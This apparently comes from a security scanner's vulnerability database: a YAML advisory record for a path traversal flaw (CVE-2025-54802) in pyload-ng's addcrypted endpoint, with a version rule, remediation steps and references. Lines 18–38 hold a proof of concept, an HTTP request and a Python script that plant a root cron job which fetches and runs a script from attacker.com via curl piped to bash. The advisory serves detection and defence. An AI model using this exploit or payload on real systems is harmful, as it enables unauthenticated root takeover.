Cradicle Explorer
ai-agents-security_AI-Infra-Guard
/ data / vuln_en / pyload-ng / CVE-2025-54802.yaml
CVE-2025-54802.yaml
 1  info:
 2    name: pyload-ng
 3    cve: CVE-2025-54802
 4    summary: Path Traversal in pyLoad-ng CNL Blueprint via `package` parameter allows Arbitrary File Write leading to Remote Code Execution (RCE).
 5    details: |
 6      The `addcrypted` endpoint in `pyload-ng` suffers from an unsafe path construction vulnerability, allowing unauthenticated attackers to write arbitrary files outside the designated storage directory. This can be abused to overwrite critical system files, including cron jobs and systemd services, leading to privilege escalation and remote code execution as root.
 7      **Endpoint**: `POST /addcrypted`
 8      **Issue**: `src/pyload/webui/app/blueprints/cnl_blueprint.py`
 9      #### Vulnerable Code
10      ```python
11       dlc_path = os.path.join(
12           dl_path, package.replace("/", "").replace("\\", "").replace(":", "") + ".dlc"
13       )
14       dlc = flask.request.form["crypted"].replace(" ", "+")
15       with open(dlc_path, mode="wb") as fp:
16      ```
17      #### PoC
18      ```http
19      POST /addcrypted HTTP/1.1
20      Host: localhost:8000
21      Content-Type: application/x-www-form-urlencoded
22      Content-Length: 107
23      package=../../../../etc/cron.d/payload&crypted=KioqICogKiAqKiByb290IGN1cmwgLXMgaHR0cDovL2F0dGFja2VyLmNvbS9yLnNoIHwgYmFzaA==
24      ```
25      Decoded payload:
26      ```bash
27      * * * * * root curl -s http://attacker.com/r.sh | bash
28      ```
29      **Send crafted POST**
30      ```python
31      import requests, base64
32      payload = "* * * * * root curl http://attacker.com/rev.sh | bash"
33      b64 = base64.b64encode(payload.encode()).decode()
34      requests.post("http://localhost:8000/addcrypted", data={
35          "package": "../../../../etc/cron.d/exploit",
36          "crypted": b64
37      })
38      ```
39      The vulnerability allows unauthenticated attackers to write arbitrary files outside the intended directory via a path traversal flaw in the `addcrypted` endpoint in `pyload-ng` parameter. When exploited, it enables remote code execution as **root** by injecting malicious cron jobs or system files, turning a simple file upload endpoint into a full system compromise vector.
40    cvss: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
41    severity: CRITICAL
42    security_advise: |
43      1. Upgrade to version `0.5.0b3.dev90` or later.
44      2. Apply the patch from commit `70a44fe02c03bce92337b5d370d2a45caa4de3d4` if an upgrade is not immediately possible.
45      3. Implement strict input validation and sanitization for the `package` parameter to prevent directory traversal characters.
46      4. Ensure that file write operations are restricted to designated, non-sensitive directories.
47  rule: version < "0.5.0b3.dev90"
48  references:
49    - https://github.com/pyload/pyload/security/advisories/GHSA-48rp-jc79-2264
50    - https://nvd.nist.gov/vuln/detail/CVE-2025-54802
51    - https://github.com/pyload/pyload/pull/4596
52    - https://github.com/pyload/pyload/commit/70a44fe02c03bce92337b5d370d2a45caa4de3d4
53    - https://github.com/pyload/pyload